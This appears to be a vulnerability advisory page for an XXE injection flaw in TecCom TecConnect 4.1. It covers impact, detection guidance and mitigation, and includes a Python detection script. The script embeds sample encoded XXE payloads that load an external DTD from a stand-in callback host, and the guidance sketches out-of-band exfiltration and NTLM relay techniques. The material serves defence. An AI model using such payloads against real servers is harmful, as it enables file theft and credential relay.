CVE-2025-10183
BaseFortify

Publication date: 2025-09-09

Last updated on: 2025-09-09

Assigner: Black Lantern Security

Description
A blind XML External Entity (XXE) injection in the OpenMessaging webservice in TecCom TecConnect 4.1 allows an unauthenticated attacker to exfiltrate arbitrary files to an attacker-controlled server. TecConnect 4.1 is considered end-of-life as of December 2023. Users are advised to upgrade to TecCom Connect 5.
Meta Information
Published: 2025-09-09
Last Modified: 2025-09-09
Generated: 2026-06-16
AI Q&A: 2025-09-09
EPSS Evaluated: 2026-06-14
Affected Vendors & Products
Vendor | Product | Version / Range
teccom | tecconnect | 5
teccom | tecconnect | 4.1
CWE ID | Description
CWE-611 | The product processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.
Executive Summary

CVE-2025-10183 is a blind XML External Entity (XXE) injection vulnerability in the OpenMessaging webservice of TecCom TecConnect version 4.1. It allows an unauthenticated attacker to send specially crafted XML payloads that exploit the XML parser to read arbitrary files from the server and send their contents to an attacker-controlled server. The vulnerability involves bypassing error message encodings and leveraging local DTDs to exfiltrate files and relay NTLM hashes, potentially leading to full system compromise. [1]

Impact Analysis

This vulnerability can have severe impacts including unauthorized disclosure of sensitive files from the server, exfiltration of arbitrary data, and escalation to full system compromise through NTLM hash relay attacks. An attacker can read local files, capture authentication hashes, and potentially gain control over the affected system, leading to data breaches and loss of system integrity. [1]

Detection Guidance

Detection can be performed by targeting the vulnerable OpenMessaging webservice endpoint, typically at openmessaging.asmx, with crafted SOAP POST requests containing HTML-encoded XXE payloads. Techniques include sending out-of-band XXE payloads that trigger DNS or HTTP callbacks to an attacker-controlled server (e.g., Burp Collaborator) to confirm the vulnerability. Tools and methods used include IIS Shortname Enumeration to locate endpoints, Wsdler to parse the WSDL, and Burp Suite Repeater for sending crafted requests. Additionally, unusual outbound DNS or HTTP requests from the server may indicate exploitation attempts and should be monitored. No specific commands are provided; the recommended approach is Burp Suite with crafted SOAP requests combined with monitoring for network callbacks. [1]
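For the monitoring side of the guidance above, the following added example (not part of the advisory or of any TecCom code) inspects captured request bodies sent to openmessaging.asmx, undoes HTML entity encoding layer by layer, and flags DTD declarations along with any external references an analyst can then look for in egress logs. It assumes legitimate messages never carry a DOCTYPE or ENTITY declaration; the function names, request path and sample bodies are constructed for illustration.

```python
import html
import re

ENDPOINT = "openmessaging.asmx"  # endpoint named in the advisory text
# Assumption: a legitimate SOAP message has no reason to declare a DTD.
DTD_MARKER = re.compile(r"<!\s*(DOCTYPE|ENTITY)\b", re.IGNORECASE)
EXTERNAL_REF = re.compile(r"\b(?:SYSTEM|PUBLIC)\s+[\"']([^\"']+)[\"']", re.IGNORECASE)


def decode_layers(body, max_rounds=3):
    """Return the body plus each successive HTML-entity-decoded form."""
    layers = [body]
    for _ in range(max_rounds):
        decoded = html.unescape(layers[-1])
        if decoded == layers[-1]:  # nothing left to decode
            break
        layers.append(decoded)
    return layers


def inspect_request(method, path, body):
    """Return a finding dict for a suspicious POST to the endpoint, else None."""
    if method.upper() != "POST" or ENDPOINT not in path.lower():
        return None
    for depth, layer in enumerate(decode_layers(body)):
        if DTD_MARKER.search(layer):
            # External identifiers are the hosts/paths to pivot on in DNS,
            # proxy and firewall logs for the same time window.
            refs = EXTERNAL_REF.findall(layer)
            return {"path": path, "encoding_depth": depth, "external_refs": refs}
    return None


# Constructed sample bodies (not captured traffic).
BENIGN = ('<soap:Envelope><soap:Body><Msg>&lt;Order id="1"/&gt;</Msg>'
          '</soap:Body></soap:Envelope>')
ENCODED = ('<soap:Envelope><soap:Body><Msg>&lt;!DOCTYPE d [&lt;!ENTITY % x SYSTEM '
           '&quot;http://callback.example.invalid/a.dtd&quot;&gt; %x;]&gt;</Msg>'
           '</soap:Body></soap:Envelope>')
DOUBLE_ENCODED = ENCODED.replace("&", "&amp;")  # one extra encoding layer

if __name__ == "__main__":
    for name, body in [("benign", BENIGN), ("encoded", ENCODED),
                       ("double", DOUBLE_ENCODED)]:
        print(name, inspect_request("POST", "/services/OpenMessaging.asmx", body))
```

A non-zero `encoding_depth` means the declaration was hidden behind entity encoding, which is why matching on a literal `<!DOCTYPE` in raw request logs is not sufficient here.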

Mitigation Strategies

The immediate mitigation step is to upgrade from the vulnerable TecCom TecConnect 4.1, which is end-of-life as of December 2023, to TecCom Connect 5. This upgrade addresses the vulnerability. Since the vulnerable component is the OpenMessaging webservice at openmessaging.asmx, restricting or disabling access to this endpoint until upgrade may also reduce risk. Additionally, monitoring and blocking suspicious outbound network traffic related to XXE exploitation attempts can help mitigate impact. [1]
